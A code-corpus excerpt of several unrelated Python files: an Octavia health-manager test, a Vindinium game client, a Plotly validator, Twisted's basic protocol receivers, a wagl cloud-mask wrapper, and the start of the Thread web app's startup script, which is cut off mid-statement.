@mock.patch('octavia.controller.healthmanager.'
'health_manager.HealthManager')
def test_hm_health_check(self, mock_health, mock_signal, mock_worker,
mock_start, mock_event):
mock_event.is_set.side_effect = [False, True]
hm_mock = mock.MagicMock()
mock_worker.return_value = None
health_check_mock = mock.MagicMock()
hm_mock.health_check = health_check_mock
mock_health.return_value = hm_mock
health_manager.hm_health_check(mock_event)
mock_health.assert_called_once_with(mock_event)
@mock.patch('multiprocessing.Process')
@mock.patch('octavia.common.service.prepare_service')
def test_main(self, mock_service, mock_process):
mock_listener_proc = mock.MagicMock()
mock_health_proc = mock.MagicMock()
mock_process.side_effect = [mock_listener_proc, mock_health_proc]
health_manager.main()
mock_listener_proc.start.assert_called_once_with()
mock_health_proc.start.assert_called_once_with()
mock_listener_proc.join.assert_called_once_with()
mock_health_proc.join.assert_called_once_with()
@mock.patch('os.kill')
@mock.patch('multiprocessing.Process')
@mock.patch('octavia.common.service.prepare_service')
def test_main_keyboard_interrupt(self, mock_service, mock_process,
mock_kill):
mock_listener_proc = mock.MagicMock()
mock_health_proc = mock.MagicMock()
mock_join = mock.MagicMock()
mock_join.side_effect = [KeyboardInterrupt, None]
mock_listener_proc.join = mock_join
mock_process.side_effect = [mock_listener_proc, mock_health_proc]
health_manager.main()
mock_listener_proc.start.assert_called_once_with()
mock_health_proc.start.assert_called_once_with()
self.assertEqual(2, mock_listener_proc.join.call_count)
mock_health_proc.join.assert_called_once_with()
mock_kill.assert_called_once_with(mock_health_proc.pid,
signal.SIGINT)
@mock.patch('os.kill')
@mock.patch('oslo_config.cfg.CONF.mutate_config_files')
def test_handle_mutate_config(self, mock_mutate, mock_kill):
health_manager._handle_mutate_config(1, 2)
mock_mutate.assert_called_once()
calls = [mock.call(1, signal.SIGHUP), mock.call(2, signal.SIGHUP)]
mock_kill.assert_has_calls(calls)
|
the-stack_106_22122
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import webbrowser
import sys
CONFIG_KEYS = ['mode']
DIRECTIONS = ['Stay', 'North', 'South', 'East', 'West']
TIMEOUT = 15
# This is the class that a program interacts with
class client:
"""A client for interacting with the vindinium server"""
def __init__(self):
self.key = None
self.game = None
self.hero = None
self.viewUrl = None
self.playUrl = None
self.config = {}
self.session = None
def setKey(self, key):
self.key = key
def setParam(self, key, value):
# Apply checks to make sure the key is a valid setting
if key in CONFIG_KEYS:
self.config[key] = value
else:
print('Skipping', key, 'because it is not a valid config parameter.')
def startGame(self):
self.session = requests.session()
server_url = 'http://vindinium.org'
if self.config['mode'] == 'arena':
api_url = '/api/arena'
else:
api_url = '/api/training'
response = self._request({'key': self.key}, server_url + api_url)
if response == None:
print('Error: game could not be initialized')
sys.exit(1)
self.game = Game(response['game'])
self.hero = Hero(response['hero'])
self.viewUrl = response['viewUrl']
self.playUrl = response['playUrl']
# Print a message that the game has started
print(str('Game Started at:'), str(self.viewUrl))
webbrowser.open(self.viewUrl)
def makeMove(self, move):
"""Make a move and update the client's state"""
if move not in DIRECTIONS:
move = 'Stay'
response = self._request({'dir': move})
self.game = Game(response['game'])
self.hero = Hero(response['hero'])
def close(self):
self.session.close()
def _request(self, params = {}, url = None):
"""Send a move to the vindinium server"""
if url == None:
url = self.playUrl
try:
response = self.session.post(url, params, timeout=TIMEOUT)
if response.status_code == 200:
# HTTP OK
return response.json()
else:
print("HTTP Error", str(response.status_code), ":", response.text)
sys.exit(1)
except requests.exceptions.RequestException as e:
print('Error in request:', str(e))
class Game:
"""A class representing the vindinium game object"""
def __init__(self, state):
# Set the default values of the game
self.state = state
self.heroes = []
self.turn = state['turn']
self.maxTurns = state['maxTurns']
self.finished = state['finished']
self.board = Board(state['board'])
for i in range(0, len(state['heroes'])):
self.heroes.append(Hero(state['heroes'][i]))
def results(self):
print('Finished.')
class Board:
"""A class representing the board of the game"""
def __init__(self, board):
self.size = None
self.map = []
self.mines = []
self.process(board)
def process(self, board):
self.size = board['size']
# Loop through the tiles to add locations to the map
# y is the row number, x is the col number
for y in range(0, len(board['tiles']), self.size * 2):
maprow = []
for x in range(0, self.size * 2, 2):
tile = board['tiles'][x+y]
if tile == ' ':
# empty space
maprow.append(' ')
elif tile == '#':
# wall
maprow.append('#')
elif tile == '$':
# mine
self.mines.append((int(y/(self.size*2)),int(x/2)))
next_tile = board['tiles'][x+y+1]
if next_tile == '1':
maprow.append('r')
elif next_tile == '2':
maprow.append('b')
elif next_tile == '3':
maprow.append('g')
elif next_tile == '4':
maprow.append('y')
elif next_tile == '-':
maprow.append('$')
elif tile == '[':
# tavern
maprow.append('T')
elif tile == '@':
# player
next_tile = board['tiles'][x+y+1]
if next_tile == '1':
maprow.append('R')
elif next_tile == '2':
maprow.append('B')
elif next_tile == '3':
maprow.append('G')
elif next_tile == '4':
maprow.append('Y')
self.map.append(maprow)
def __getitem__(self, index):
return self.map[index]
def __str__(self):
result = ''
for row in range(0, len(self.map)):
result += ''.join(self.map[row]) + '\n'
return result
class Hero:
"""A class representing the vindinium hero object"""
def __init__(self, hero):
try:
self.lastDir = hero['lastDir']
except KeyError:
self.lastDir = None
self.pos = (hero['pos']['x'], hero['pos']['y'])
self.life = hero['life']
self.gold = hero['gold']
self.mineCount = hero['mineCount']
self.spawnPos = (hero['spawnPos']['x'], hero['spawnPos']['y'])
self.crashed = hero['crashed']
if __name__ == '__main__':
pass
|
the-stack_106_22123
|
import _plotly_utils.basevalidators
class ShowticksuffixValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(
self, plotly_name="showticksuffix", parent_name="choropleth.colorbar", **kwargs
):
super(ShowticksuffixValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
values=kwargs.pop("values", ["all", "first", "last", "none"]),
**kwargs,
)
|
the-stack_106_22126
|
# -*- test-case-name: twisted.test.test_protocols -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Basic protocols, such as line-oriented, netstring, and int prefixed strings.
Maintainer: Itamar Shtull-Trauring
"""
# System imports
import re
import struct
import warnings
import cStringIO
import math
from zope.interface import implements
# Twisted imports
from twisted.internet import protocol, defer, interfaces, error
from twisted.python import log, deprecate, versions
LENGTH, DATA, COMMA = range(3)
NUMBER = re.compile('(\d*)(:?)')
deprecatedSince = versions.Version("Twisted", 10, 2, 0)
message = "NetstringReceiver parser state is private."
for attr in ["LENGTH", "DATA", "COMMA", "NUMBER"]:
deprecate.deprecatedModuleAttribute(
deprecatedSince, message, __name__, attr)
del deprecatedSince, message, attr
DEBUG = 0
class NetstringParseError(ValueError):
"""
The incoming data is not in valid Netstring format.
"""
class IncompleteNetstring(Exception):
"""
Not enough data to complete a netstring.
"""
class NetstringReceiver(protocol.Protocol):
"""
A protocol that sends and receives netstrings.
See U{http://cr.yp.to/proto/netstrings.txt} for the specification of
netstrings. Every netstring starts with digits that specify the length
of the data. This length specification is separated from the data by
a colon. The data is terminated with a comma.
Override L{stringReceived} to handle received netstrings. This
method is called with the netstring payload as a single argument
whenever a complete netstring is received.
Security features:
1. Messages are limited in size, useful if you don't want
someone sending you a 500MB netstring (change C{self.MAX_LENGTH}
to the maximum length you wish to accept).
2. The connection is lost if an illegal message is received.
@ivar MAX_LENGTH: Defines the maximum length of netstrings that can be
received.
@type MAX_LENGTH: C{int}
@ivar _LENGTH: A pattern describing all strings that contain a netstring
length specification. Examples for length specifications are '0:',
'12:', and '179:'. '007:' is no valid length specification, since
leading zeros are not allowed.
@type _LENGTH: C{re.Match}
@ivar _LENGTH_PREFIX: A pattern describing all strings that contain
the first part of a netstring length specification (without the
trailing comma). Examples are '0', '12', and '179'. '007' does not
start a netstring length specification, since leading zeros are
not allowed.
@type _LENGTH_PREFIX: C{re.Match}
@ivar _PARSING_LENGTH: Indicates that the C{NetstringReceiver} is in
the state of parsing the length portion of a netstring.
@type _PARSING_LENGTH: C{int}
@ivar _PARSING_PAYLOAD: Indicates that the C{NetstringReceiver} is in
the state of parsing the payload portion (data and trailing comma)
of a netstring.
@type _PARSING_PAYLOAD: C{int}
@ivar brokenPeer: Indicates if the connection is still functional
@type brokenPeer: C{int}
@ivar _state: Indicates if the protocol is consuming the length portion
(C{PARSING_LENGTH}) or the payload (C{PARSING_PAYLOAD}) of a netstring
@type _state: C{int}
@ivar _remainingData: Holds the chunk of data that has not yet been consumed
@type _remainingData: C{string}
@ivar _payload: Holds the payload portion of a netstring including the
trailing comma
@type _payload: C{cStringIO.StringIO}
@ivar _expectedPayloadSize: Holds the payload size plus one for the trailing
comma.
@type _expectedPayloadSize: C{int}
"""
MAX_LENGTH = 99999
_LENGTH = re.compile('(0|[1-9]\d*)(:)')
_LENGTH_PREFIX = re.compile('(0|[1-9]\d*)$')
# Some error information for NetstringParseError instances.
_MISSING_LENGTH = ("The received netstring does not start with a "
"length specification.")
_OVERFLOW = ("The length specification of the received netstring "
"cannot be represented in Python - it causes an "
"OverflowError!")
_TOO_LONG = ("The received netstring is longer than the maximum %s "
"specified by self.MAX_LENGTH")
_MISSING_COMMA = "The received netstring is not terminated by a comma."
_DATA_SUPPORT_DEPRECATED = ("Data passed to sendString() must be a string. "
"Non-string support is deprecated since "
"Twisted 10.0")
# The following constants are used for determining if the NetstringReceiver
# is parsing the length portion of a netstring, or the payload.
_PARSING_LENGTH, _PARSING_PAYLOAD = range(2)
def makeConnection(self, transport):
"""
Initializes the protocol.
"""
protocol.Protocol.makeConnection(self, transport)
self._remainingData = ""
self._currentPayloadSize = 0
self._payload = cStringIO.StringIO()
self._state = self._PARSING_LENGTH
self._expectedPayloadSize = 0
self.brokenPeer = 0
def sendString(self, string):
"""
Sends a netstring.
Wraps up C{string} by adding length information and a
trailing comma; writes the result to the transport.
@param string: The string to send. The necessary framing (length
prefix, etc) will be added.
@type string: C{str}
"""
if not isinstance(string, str):
warnings.warn(self._DATA_SUPPORT_DEPRECATED, DeprecationWarning, 2)
string = str(string)
self.transport.write('%d:%s,' % (len(string), string))
def dataReceived(self, data):
"""
Receives some characters of a netstring.
Whenever a complete netstring is received, this method extracts
its payload and calls L{stringReceived} to process it.
@param data: A chunk of data representing a (possibly partial)
netstring
@type data: C{str}
"""
self._remainingData += data
while self._remainingData:
try:
self._consumeData()
except IncompleteNetstring:
break
except NetstringParseError:
self._handleParseError()
break
def stringReceived(self, string):
"""
Override this for notification when each complete string is received.
@param string: The complete string which was received with all
framing (length prefix, etc) removed.
@type string: C{str}
@raise NotImplementedError: because the method has to be implemented
by the child class.
"""
raise NotImplementedError()
def _maxLengthSize(self):
"""
Calculate and return the string size of C{self.MAX_LENGTH}.
@return: The size of the string representation for C{self.MAX_LENGTH}
@rtype: C{float}
"""
return math.ceil(math.log10(self.MAX_LENGTH)) + 1
def _consumeData(self):
"""
Consumes the content of C{self._remainingData}.
@raise IncompleteNetstring: if C{self._remainingData} does not
contain enough data to complete the current netstring.
@raise NetstringParseError: if the received data do not
form a valid netstring.
"""
if self._state == self._PARSING_LENGTH:
self._consumeLength()
self._prepareForPayloadConsumption()
if self._state == self._PARSING_PAYLOAD:
self._consumePayload()
def _consumeLength(self):
"""
Consumes the length portion of C{self._remainingData}.
@raise IncompleteNetstring: if C{self._remainingData} contains
a partial length specification (digits without trailing
comma).
@raise NetstringParseError: if the received data do not form a valid
netstring.
"""
lengthMatch = self._LENGTH.match(self._remainingData)
if not lengthMatch:
self._checkPartialLengthSpecification()
raise IncompleteNetstring()
self._processLength(lengthMatch)
def _checkPartialLengthSpecification(self):
"""
Makes sure that the received data represents a valid number.
Checks if C{self._remainingData} represents a number smaller or
equal to C{self.MAX_LENGTH}.
@raise NetstringParseError: if C{self._remainingData} is no
number or is too big (checked by L{extractLength}).
"""
partialLengthMatch = self._LENGTH_PREFIX.match(self._remainingData)
if not partialLengthMatch:
raise NetstringParseError(self._MISSING_LENGTH)
lengthSpecification = (partialLengthMatch.group(1))
self._extractLength(lengthSpecification)
def _processLength(self, lengthMatch):
"""
Processes the length definition of a netstring.
Extracts and stores in C{self._expectedPayloadSize} the number
representing the netstring size. Removes the prefix
representing the length specification from
C{self._remainingData}.
@raise NetstringParseError: if the received netstring does not
start with a number or the number is bigger than
C{self.MAX_LENGTH}.
@param lengthMatch: A regular expression match object matching
a netstring length specification
@type lengthMatch: C{re.Match}
"""
endOfNumber = lengthMatch.end(1)
startOfData = lengthMatch.end(2)
lengthString = self._remainingData[:endOfNumber]
# Expect payload plus trailing comma:
self._expectedPayloadSize = self._extractLength(lengthString) + 1
self._remainingData = self._remainingData[startOfData:]
def _extractLength(self, lengthAsString):
"""
Attempts to extract the length information of a netstring.
@raise NetstringParseError: if the number is bigger than
C{self.MAX_LENGTH}.
@param lengthAsString: A chunk of data starting with a length
specification
@type lengthAsString: C{str}
@return: The length of the netstring
@rtype: C{int}
"""
self._checkStringSize(lengthAsString)
length = int(lengthAsString)
if length > self.MAX_LENGTH:
raise NetstringParseError(self._TOO_LONG % (self.MAX_LENGTH,))
return length
def _checkStringSize(self, lengthAsString):
"""
Checks the sanity of lengthAsString.
Checks if the size of the length specification exceeds the
size of the string representing self.MAX_LENGTH. If this is
not the case, the number represented by lengthAsString is
certainly bigger than self.MAX_LENGTH, and a
NetstringParseError can be raised.
This method should make sure that netstrings with extremely
long length specifications are refused before even attempting
to convert them to an integer (which might trigger a
MemoryError).
"""
if len(lengthAsString) > self._maxLengthSize():
raise NetstringParseError(self._TOO_LONG % (self.MAX_LENGTH,))
def _prepareForPayloadConsumption(self):
"""
Sets up variables necessary for consuming the payload of a netstring.
"""
self._state = self._PARSING_PAYLOAD
self._currentPayloadSize = 0
self._payload.seek(0)
self._payload.truncate()
def _consumePayload(self):
"""
Consumes the payload portion of C{self._remainingData}.
If the payload is complete, checks for the trailing comma and
processes the payload. If not, raises an L{IncompleteNetstring}
exception.
@raise IncompleteNetstring: if the payload received so far
contains fewer characters than expected.
@raise NetstringParseError: if the payload does not end with a
comma.
"""
self._extractPayload()
if self._currentPayloadSize < self._expectedPayloadSize:
raise IncompleteNetstring()
self._checkForTrailingComma()
self._state = self._PARSING_LENGTH
self._processPayload()
def _extractPayload(self):
"""
Extracts payload information from C{self._remainingData}.
Splits C{self._remainingData} at the end of the netstring. The
first part becomes C{self._payload}, the second part is stored
in C{self._remainingData}.
If the netstring is not yet complete, the whole content of
C{self._remainingData} is moved to C{self._payload}.
"""
if self._payloadComplete():
remainingPayloadSize = (self._expectedPayloadSize -
self._currentPayloadSize)
self._payload.write(self._remainingData[:remainingPayloadSize])
self._remainingData = self._remainingData[remainingPayloadSize:]
self._currentPayloadSize = self._expectedPayloadSize
else:
self._payload.write(self._remainingData)
self._currentPayloadSize += len(self._remainingData)
self._remainingData = ""
def _payloadComplete(self):
"""
Checks if enough data have been received to complete the netstring.
@return: C{True} iff the received data contain at least as many
characters as specified in the length section of the
netstring
@rtype: C{bool}
"""
return (len(self._remainingData) + self._currentPayloadSize >=
self._expectedPayloadSize)
def _processPayload(self):
"""
Processes the actual payload with L{stringReceived}.
Strips C{self._payload} of the trailing comma and calls
L{stringReceived} with the result.
"""
self.stringReceived(self._payload.getvalue()[:-1])
def _checkForTrailingComma(self):
"""
Checks if the netstring has a trailing comma at the expected position.
@raise NetstringParseError: if the last payload character is
anything but a comma.
"""
if self._payload.getvalue()[-1] != ",":
raise NetstringParseError(self._MISSING_COMMA)
def _handleParseError(self):
"""
Terminates the connection and sets the flag C{self.brokenPeer}.
"""
self.transport.loseConnection()
self.brokenPeer = 1
class LineOnlyReceiver(protocol.Protocol):
"""
A protocol that receives only lines.
This is purely a speed optimisation over LineReceiver, for the
cases that raw mode is known to be unnecessary.
@cvar delimiter: The line-ending delimiter to use. By default this is
'\\r\\n'.
@cvar MAX_LENGTH: The maximum length of a line to allow (If a
sent line is longer than this, the connection is dropped).
Default is 16384.
"""
_buffer = ''
delimiter = '\r\n'
MAX_LENGTH = 16384
def dataReceived(self, data):
"""
Translates bytes into lines, and calls lineReceived.
"""
lines = (self._buffer+data).split(self.delimiter)
self._buffer = lines.pop(-1)
for line in lines:
if self.transport.disconnecting:
# this is necessary because the transport may be told to lose
# the connection by a line within a larger packet, and it is
# important to disregard all the lines in that packet following
# the one that told it to close.
return
if len(line) > self.MAX_LENGTH:
return self.lineLengthExceeded(line)
else:
self.lineReceived(line)
if len(self._buffer) > self.MAX_LENGTH:
return self.lineLengthExceeded(self._buffer)
def lineReceived(self, line):
"""
Override this for when each line is received.
@param line: The line which was received with the delimiter removed.
@type line: C{str}
"""
raise NotImplementedError
def sendLine(self, line):
"""
Sends a line to the other end of the connection.
@param line: The line to send, not including the delimiter.
@type line: C{str}
"""
return self.transport.writeSequence((line, self.delimiter))
def lineLengthExceeded(self, line):
"""
Called when the maximum line length has been reached.
Override if it needs to be dealt with in some special way.
"""
return error.ConnectionLost('Line length exceeded')
class _PauseableMixin:
paused = False
def pauseProducing(self):
self.paused = True
self.transport.pauseProducing()
def resumeProducing(self):
self.paused = False
self.transport.resumeProducing()
self.dataReceived('')
def stopProducing(self):
self.paused = True
self.transport.stopProducing()
class LineReceiver(protocol.Protocol, _PauseableMixin):
"""
A protocol that receives lines and/or raw data, depending on mode.
In line mode, each line that's received becomes a callback to
L{lineReceived}. In raw data mode, each chunk of raw data becomes a
callback to L{rawDataReceived}. The L{setLineMode} and L{setRawMode}
methods switch between the two modes.
This is useful for line-oriented protocols such as IRC, HTTP, POP, etc.
@cvar delimiter: The line-ending delimiter to use. By default this is
'\\r\\n'.
@cvar MAX_LENGTH: The maximum length of a line to allow (If a
sent line is longer than this, the connection is dropped).
Default is 16384.
"""
line_mode = 1
__buffer = ''
delimiter = '\r\n'
MAX_LENGTH = 16384
def clearLineBuffer(self):
"""
Clear buffered data.
@return: All of the cleared buffered data.
@rtype: C{str}
"""
b = self.__buffer
self.__buffer = ""
return b
def dataReceived(self, data):
"""
Protocol.dataReceived.
Translates bytes into lines, and calls lineReceived (or
rawDataReceived, depending on mode.)
"""
self.__buffer = self.__buffer+data
while self.line_mode and not self.paused:
try:
line, self.__buffer = self.__buffer.split(self.delimiter, 1)
except ValueError:
if len(self.__buffer) > self.MAX_LENGTH:
line, self.__buffer = self.__buffer, ''
return self.lineLengthExceeded(line)
break
else:
linelength = len(line)
if linelength > self.MAX_LENGTH:
exceeded = line + self.__buffer
self.__buffer = ''
return self.lineLengthExceeded(exceeded)
why = self.lineReceived(line)
if why or self.transport and self.transport.disconnecting:
return why
else:
if not self.paused:
data=self.__buffer
self.__buffer=''
if data:
return self.rawDataReceived(data)
def setLineMode(self, extra=''):
"""
Sets the line-mode of this receiver.
If you are calling this from a rawDataReceived callback,
you can pass in extra unhandled data, and that data will
be parsed for lines. Further data received will be sent
to lineReceived rather than rawDataReceived.
Do not pass extra data if calling this function from
within a lineReceived callback.
"""
self.line_mode = 1
if extra:
return self.dataReceived(extra)
def setRawMode(self):
"""
Sets the raw mode of this receiver.
Further data received will be sent to rawDataReceived rather
than lineReceived.
"""
self.line_mode = 0
def rawDataReceived(self, data):
"""
Override this for when raw data is received.
"""
raise NotImplementedError
def lineReceived(self, line):
"""
Override this for when each line is received.
@param line: The line which was received with the delimiter removed.
@type line: C{str}
"""
raise NotImplementedError
def sendLine(self, line):
"""
Sends a line to the other end of the connection.
@param line: The line to send, not including the delimiter.
@type line: C{str}
"""
return self.transport.write(line + self.delimiter)
def lineLengthExceeded(self, line):
"""
Called when the maximum line length has been reached.
Override if it needs to be dealt with in some special way.
The argument 'line' contains the remainder of the buffer, starting
with (at least some part) of the line which is too long. This may
be more than one line, or may be only the initial portion of the
line.
"""
return self.transport.loseConnection()
class StringTooLongError(AssertionError):
"""
Raised when trying to send a string too long for a length prefixed
protocol.
"""
class IntNStringReceiver(protocol.Protocol, _PauseableMixin):
"""
Generic class for length prefixed protocols.
@ivar recvd: buffer holding received data when splitted.
@type recvd: C{str}
@ivar structFormat: format used for struct packing/unpacking. Define it in
subclass.
@type structFormat: C{str}
@ivar prefixLength: length of the prefix, in bytes. Define it in subclass,
using C{struct.calcsize(structFormat)}
@type prefixLength: C{int}
"""
MAX_LENGTH = 99999
recvd = ""
def stringReceived(self, string):
"""
Override this for notification when each complete string is received.
@param string: The complete string which was received with all
framing (length prefix, etc) removed.
@type string: C{str}
"""
raise NotImplementedError
def lengthLimitExceeded(self, length):
"""
Callback invoked when a length prefix greater than C{MAX_LENGTH} is
received. The default implementation disconnects the transport.
Override this.
@param length: The length prefix which was received.
@type length: C{int}
"""
self.transport.loseConnection()
def dataReceived(self, recd):
"""
Convert int prefixed strings into calls to stringReceived.
"""
self.recvd = self.recvd + recd
while len(self.recvd) >= self.prefixLength and not self.paused:
length ,= struct.unpack(
self.structFormat, self.recvd[:self.prefixLength])
if length > self.MAX_LENGTH:
self.lengthLimitExceeded(length)
return
if len(self.recvd) < length + self.prefixLength:
break
packet = self.recvd[self.prefixLength:length + self.prefixLength]
self.recvd = self.recvd[length + self.prefixLength:]
self.stringReceived(packet)
def sendString(self, string):
"""
Send a prefixed string to the other end of the connection.
@param string: The string to send. The necessary framing (length
prefix, etc) will be added.
@type string: C{str}
"""
if len(string) >= 2 ** (8 * self.prefixLength):
raise StringTooLongError(
"Try to send %s bytes whereas maximum is %s" % (
len(string), 2 ** (8 * self.prefixLength)))
self.transport.write(
struct.pack(self.structFormat, len(string)) + string)
class Int32StringReceiver(IntNStringReceiver):
"""
A receiver for int32-prefixed strings.
An int32 string is a string prefixed by 4 bytes, the 32-bit length of
the string encoded in network byte order.
This class publishes the same interface as NetstringReceiver.
"""
structFormat = "!I"
prefixLength = struct.calcsize(structFormat)
class Int16StringReceiver(IntNStringReceiver):
"""
A receiver for int16-prefixed strings.
An int16 string is a string prefixed by 2 bytes, the 16-bit length of
the string encoded in network byte order.
This class publishes the same interface as NetstringReceiver.
"""
structFormat = "!H"
prefixLength = struct.calcsize(structFormat)
class Int8StringReceiver(IntNStringReceiver):
"""
A receiver for int8-prefixed strings.
An int8 string is a string prefixed by 1 byte, the 8-bit length of
the string.
This class publishes the same interface as NetstringReceiver.
"""
structFormat = "!B"
prefixLength = struct.calcsize(structFormat)
class StatefulStringProtocol:
"""
A stateful string protocol.
This is a mixin for string protocols (Int32StringReceiver,
NetstringReceiver) which translates stringReceived into a callback
(prefixed with 'proto_') depending on state.
The state 'done' is special; if a proto_* method returns it, the
connection will be closed immediately.
"""
state = 'init'
def stringReceived(self, string):
"""
Choose a protocol phase function and call it.
Call back to the appropriate protocol phase; this begins with
the function proto_init and moves on to proto_* depending on
what each proto_* function returns. (For example, if
self.proto_init returns 'foo', then self.proto_foo will be the
next function called when a protocol message is received.
"""
try:
pto = 'proto_'+self.state
statehandler = getattr(self,pto)
except AttributeError:
log.msg('callback',self.state,'not found')
else:
self.state = statehandler(string)
if self.state == 'done':
self.transport.loseConnection()
class FileSender:
"""
A producer that sends the contents of a file to a consumer.
This is a helper for protocols that, at some point, will take a
file-like object, read its contents, and write them out to the network,
optionally performing some transformation on the bytes in between.
"""
implements(interfaces.IProducer)
CHUNK_SIZE = 2 ** 14
lastSent = ''
deferred = None
def beginFileTransfer(self, file, consumer, transform = None):
"""
Begin transferring a file
@type file: Any file-like object
@param file: The file object to read data from
@type consumer: Any implementor of IConsumer
@param consumer: The object to write data to
@param transform: A callable taking one string argument and returning
the same. All bytes read from the file are passed through this before
being written to the consumer.
@rtype: C{Deferred}
@return: A deferred whose callback will be invoked when the file has
been completely written to the consumer. The last byte written to the
consumer is passed to the callback.
"""
self.file = file
self.consumer = consumer
self.transform = transform
self.deferred = deferred = defer.Deferred()
self.consumer.registerProducer(self, False)
return deferred
def resumeProducing(self):
chunk = ''
if self.file:
chunk = self.file.read(self.CHUNK_SIZE)
if not chunk:
self.file = None
self.consumer.unregisterProducer()
if self.deferred:
self.deferred.callback(self.lastSent)
self.deferred = None
return
if self.transform:
chunk = self.transform(chunk)
self.consumer.write(chunk)
self.lastSent = chunk[-1]
def pauseProducing(self):
pass
def stopProducing(self):
if self.deferred:
self.deferred.errback(
Exception("Consumer asked us to stop producing"))
self.deferred = None
|
the-stack_106_22129
|
from __future__ import absolute_import, print_function
from wagl.acca_cloud_masking import majority_filter
from . import fmask_cloud_masking as _fmask
def fmask_cloud_mask(
mtl, null_mask=None, cloud_prob=None, wclr_max=None, sat_tag=None, aux_data=None
):
Lnum = int(sat_tag[-1:])
(_, _, _, _, _, _, _, _, fmask_byte, _, _, _, _, _, _, _) = _fmask.plcloud(
filename=mtl, mask=null_mask, num_Lst=Lnum, aux_data=aux_data or {}
)
# Convert to bool, True = Cloud, False not Cloud
fmask_byte = fmask_byte == 1
# Use a majority filter to fill holes, 2 iterations works well to smoothe
# things over
fmask_byte = majority_filter(array=fmask_byte, iterations=2)
return ~fmask_byte # Invert
|
the-stack_106_22130
|
# NOTICE: As required by the Apache License v2.0, this notice is to state this file has been modified by Arachne Digital
# This file has been renamed from `tram.py`
# To see its full history, please use `git log --follow <filename>` to view previous commits and additional contributors
import aiohttp_jinja2
import asyncio
import argparse
import jinja2
import logging
import os
import sys
import yaml
from aiohttp import web
from threadcomponents.database.dao import Dao, DB_POSTGRESQL, DB_SQLITE
from threadcomponents.handlers.web_api import WebAPI
from threadcomponents.service.data_svc import DataService
from threadcomponents.service.ml_svc import MLService
from threadcomponents.service.reg_svc import RegService
from threadcomponents.service.rest_svc import RestService
from threadcomponents.service.web_svc import WebService
# If calling Thread from outside the project directory, then we need to specify
# a directory prefix (e.g. when Thread is a subdirectory)
dir_prefix = ''
# The types of sources for building the database
ONLINE_BUILD_SOURCE = 'taxii-server'
OFFLINE_BUILD_SOURCE = 'local-json'
async def background_tasks(taxii_local=ONLINE_BUILD_SOURCE, build=False, json_file=None):
"""
Function to run background tasks at startup
:param taxii_local: Expects 'online' or 'offline' to specify the build type.
:param build: Defines whether or not a new database will be rebuilt
:param json_file: Expects a path to the enterprise attack json if the 'json' build method is called.
:return: nil
"""
if build:
await data_svc.reload_database()
if taxii_local == ONLINE_BUILD_SOURCE:
try:
await data_svc.insert_attack_stix_data()
except Exception as exc:
logging.critical('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n'
'COULD NOT CONNECT TO TAXII SERVERS: {}\nPLEASE UTILIZE THE OFFLINE CAPABILITY FLAG '
'"-FF" FOR OFFLINE DATABASE BUILDING\n'
'!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!'.format(exc))
sys.exit()
elif taxii_local == OFFLINE_BUILD_SOURCE and json_file:
await data_svc.insert_attack_json_data(json_file)
async def init(host, port, app_setup_func=None):
"""
Function to initialize the aiohttp app
:param host: Address to reach webserver on
:param port: Port to listen on
:param app_setup_func: Optional, a function that applies extra config to the app
:return: nil
"""
# Run any required functions before the app is launched
await website_handler.pre_launch_init()
logging.info('server starting: %s:%s' % (host, port))
webapp_dir = os.path.join(dir_prefix, 'webapp')
logging.info('webapp dir is %s' % webapp_dir)
app = web.Application(middlewares=[WebAPI.req_handler])
app.router.add_route('GET', web_svc.get_route(WebService.HOME_KEY), website_handler.index)
app.router.add_route('GET', web_svc.get_route(WebService.EDIT_KEY), website_handler.edit)
app.router.add_route('GET', web_svc.get_route(WebService.ABOUT_KEY), website_handler.about)
app.router.add_route('*', web_svc.get_route(WebService.REST_KEY), website_handler.rest_api)
app.router.add_route('GET', web_svc.get_route(WebService.EXPORT_PDF_KEY), website_handler.pdf_export)
app.router.add_route('GET', web_svc.get_route(WebService.EXPORT_NAV_KEY), website_handler.nav_export)
app.router.add_route('GET', web_svc.get_route(WebService.COOKIE_KEY), website_handler.accept_cookies)
app.router.add_static(web_svc.get_route(WebService.STATIC_KEY), os.path.join(webapp_dir, 'theme'))
# If extra app-setup is required, do this
if callable(app_setup_func):
app_setup_func(app)
aiohttp_jinja2.setup(app, loader=jinja2.FileSystemLoader(os.path.join(webapp_dir, 'html')))
runner = web.AppRunner(app)
await runner.setup()
await web.TCPSite(runner, host, port).start()
# First action after app-initialisation is to resume any reports left in the queue from a previous session
await rest_svc.check_queue()
def start(host, port, taxii_local=ONLINE_BUILD_SOURCE, build=False, json_file=None, app_setup_func=None):
"""
Main function to start app
:param host: Address to reach webserver on
:param port: Port to listen on
:param taxii_local: Expects online or offline build_source to specify the build type
:param build: Defines whether or not a new database will be rebuilt
:param json_file: Expects a path to the enterprise attack json if the 'offline' build method is called
:param app_setup_func: Optional, a function that applies extra config to the app
:return: nil
"""
loop = asyncio.get_event_loop()
loop.create_task(background_tasks(taxii_local=taxii_local, build=build, json_file=json_file))
loop.run_until_complete(init(host, port, app_setup_func=app_setup_func))
try:
loop.run_forever()
except KeyboardInterrupt:
pass
def main(directory_prefix='', route_prefix=None, app_setup_func=None):
global data_svc, dir_prefix, ml_svc, rest_svc, web_svc, website_handler
dir_prefix = directory_prefix
logging.getLogger().setLevel(logging.INFO)
logging.info('Welcome to Thread')
# Read from config
with open(os.path.join(dir_prefix, 'threadcomponents', 'conf', 'config.yml')) as c:
config = yaml.safe_load(c)
is_local = config.get('run-local', True)
db_conf = config.get('db-engine', DB_SQLITE)
conf_build = config.get('build', True)
host = config.get('host', '0.0.0.0')
port = config.get('port', 9999)
taxii_local = config.get('taxii-local', 'taxii-server')
js_src = config.get('js-libraries', 'js-online-src')
max_tasks = config.get('max-analysis-tasks', 1)
queue_limit = config.get('queue_limit', 0)
json_file = config.get('json_file', None)
json_file_path = os.path.join(dir_prefix, 'threadcomponents', 'models', json_file) if json_file else None
attack_dict = None
# Set the attack dictionary filepath if applicable
if conf_build and taxii_local == OFFLINE_BUILD_SOURCE and json_file_path and os.path.isfile(json_file_path):
